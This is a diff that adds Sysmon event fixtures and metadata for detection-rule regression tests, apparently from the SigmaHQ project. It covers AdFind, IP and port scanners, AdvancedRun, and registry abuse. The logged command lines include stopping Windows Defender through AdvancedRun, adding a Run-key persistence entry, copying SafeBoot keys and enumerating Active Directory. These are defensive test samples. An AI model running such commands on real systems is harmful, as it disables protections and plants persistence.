"AdFind.exe", + "CommandLine": "AdFind.exe -f (objectcategory=person)", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02", + "ParentProcessId": 6488, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml new file mode 100644 index 000000000..48d10dc7f --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml @@ -0,0 +1,13 @@ +id: c02bbff9-3d3b-4b4b-a6f5-8c2f4cbb60ad +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 514e7e3e-b3b4-4a67-af60-be20f139198b + title: PUA - AdFind.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx new file mode 100644 index 000000000..da3e6f081 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json new file mode 100644 index 000000000..ab8d77e62 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T11:32:08.872401Z" + } + }, + "EventRecordID": 651803, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 11:32:08.871", + "ProcessGuid": "14207D89-1238-68FA-4A13-000000003F02", + "ProcessId": 8080, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -s trustdmp", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-1136-68FA-2D13-000000003F02", + "ParentProcessId": 1648, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml new file mode 100644 index 000000000..69f9d343d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml @@ -0,0 +1,13 @@ +id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + title: PUA - AdFind Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx new file mode 100644 index 000000000..0996d98ff Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json new file mode 100644 index 000000000..508e249e2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:01:48.031627Z" + } + }, + "EventRecordID": 650317, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:01:48.012", + "ProcessGuid": "14207D89-FD0C-68F9-D610-000000003F02", + "ProcessId": 2064, + "Image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe", + "FileVersion": "2.5.4594.1", + "Description": "Advanced IP Scanner", + "Product": "Advanced IP Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_ip_scanner.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe\"", + "CurrentDirectory": "C:\\Program Files (x86)\\Advanced IP Scanner\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0", + "ParentProcessGuid": "14207D89-FCFD-68F9-D010-000000003F02", + "ParentProcessId": 3240, + "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp", + "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp\" /SL5=\"$E0218,20439558,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..bdf211996 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml @@ -0,0 +1,13 @@ +id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + title: PUA - Advanced IP Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx new file mode 100644 index 000000000..105b6ce24 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json new file mode 100644 index 000000000..50406a429 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:11:05.435406Z" + } + }, + "EventRecordID": 650602, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:11:05.414", + "ProcessGuid": "14207D89-FF39-68F9-1A11-000000003F02", + "ProcessId": 7316, + "Image": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe", + "FileVersion": "-", + "Description": "Advanced Port Scanner", + "Product": "Advanced Port Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_port_scanner.exe", + "CommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe\" /portable \"C:/Users/SwachchhandaP/Downloads/\" /lng en_us", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C", + "ParentProcessGuid": "14207D89-FF2E-68F9-1911-000000003F02", + "ParentProcessId": 3972, + "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp", + "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp\" /SL5=\"$E0634,19769177,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_Port_Scanner_2.5.3869.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml new file mode 100644 index 000000000..2586d9498 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml @@ -0,0 +1,13 @@ +id: 998b5845-1623-4b2f-b9d1-bfc402172d45 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 54773c5f-f1cc-4703-9126-2f797d96a69d + title: PUA - Advanced Port Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx new file mode 100644 index 000000000..1c79d4e63 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json new file mode 100644 index 000000000..66daa3697 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:24:32.948699Z" + } + }, + "EventRecordID": 650887, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:24:32.936", + "ProcessGuid": "14207D89-0260-68FA-9511-000000003F02", + "ProcessId": 4220, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", + "FileVersion": "1.51", + "Description": "Run a program with different settings that you choose.", + "Product": "AdvancedRun", + "Company": "NirSoft", + "OriginalFileName": "AdvancedRun.exe", + "CommandLine": "\"C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe\"", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", + "ParentProcessGuid": "14207D89-91E9-68F9-E104-000000003F02", + "ParentProcessId": 452, + "ParentImage": "C:\\Windows\\explorer.exe", + "ParentCommandLine": "C:\\Windows\\Explorer.EXE", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml new file mode 100644 index 000000000..29944dc6d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml @@ -0,0 +1,13 @@ +id: 5f4db274-e3e6-45cd-a5a3-ef03f678dd28 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 + title: PUA - AdvancedRun Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx new file mode 100644 index 000000000..1572f756f Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json new file mode 100644 index 000000000..441bba366 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:19:13.088214Z" + } + }, + "EventRecordID": 650834, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:19:13.085", + "ProcessGuid": "14207D89-0121-68FA-6E11-000000003F02", + "ProcessId": 6448, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", + "FileVersion": "1.51", + "Description": "Run a program with different settings that you choose.", + "Product": "AdvancedRun", + "Company": "NirSoft", + "OriginalFileName": "AdvancedRun.exe", + "CommandLine": "AdvancedRun.exe /EXEFilename \"C:\\Windows\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", + "ParentProcessGuid": "14207D89-00ED-68FA-6611-000000003F02", + "ParentProcessId": 700, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml new file mode 100644 index 000000000..0765e7710 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml @@ -0,0 +1,13 @@ +id: 0f52b7ec-72e4-4362-acf5-b5558ff58323 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fa00b701-44c6-4679-994d-5a18afa8a707 + title: PUA - AdvancedRun Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx new file mode 100644 index 000000000..374fc3367 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json new file mode 100644 index 000000000..0d846f7a7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:35:26.043284Z" + } + }, + "EventRecordID": 256890, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:35:26.041", + "ProcessGuid": "5AB40FD1-400E-68F9-6331-000000003B02", + "ProcessId": 6032, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"softoz\" /t REG_SZ /F /D \"C:\\Users\\admin\\AppData\\Roaming\\sihostt.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml new file mode 100644 index 000000000..c196ea8c7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml @@ -0,0 +1,13 @@ +id: e60e5322-dc51-4969-be3b-12caad8a9276 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: de587dce-915e-4218-aac4-835ca6af6f70 + title: Potential Persistence Attempt Via Run Keys Using Reg.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx new file mode 100644 index 000000000..cb3ddab44 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json new file mode 100644 index 000000000..1d89262b1 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:38:06.571958Z" + } + }, + "EventRecordID": 256915, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:38:06.570", + "ProcessGuid": "5AB40FD1-40AE-68F9-7631-000000003B02", + "ProcessId": 2456, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "reg copy hklm\\system\\CurrentControlSet\\services\\acpi hklm\\system\\CurrentControlSet\\control\\safeboot\\network\\nas /s /f", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml new file mode 100644 index 000000000..1359c9d38 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml @@ -0,0 +1,13 @@ +id: 6f781d8b-1b6c-408b-a90d-08aceb2a14d0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d7662ff6-9e97-4596-a61d-9839e32dee8d + title: Add SafeBoot Keys Via Reg Utility +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx 